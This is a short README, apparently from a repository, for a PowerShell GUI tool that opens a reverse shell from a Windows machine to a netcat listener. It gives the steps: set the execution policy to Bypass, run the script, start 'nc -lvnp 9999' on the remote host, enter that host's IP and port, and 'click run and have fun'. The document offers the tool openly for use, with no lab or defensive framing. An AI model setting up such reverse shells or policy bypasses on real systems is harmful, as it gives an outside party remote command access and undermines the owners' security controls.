PowerReverseShell is a simple gui for windows powershell and Reverse Shell in connection with netcat hosts
Set-ExecutionPolicy -ExecutionPolicy Bypass
.\PowerReverseShell.ps1
- Start
nc -lvnp 9999
on remote machine - Get the IP of remote machine
ip a
oripconfig
- On Windows machine enter the IP and Port 9999
- Click run and have fun
cheers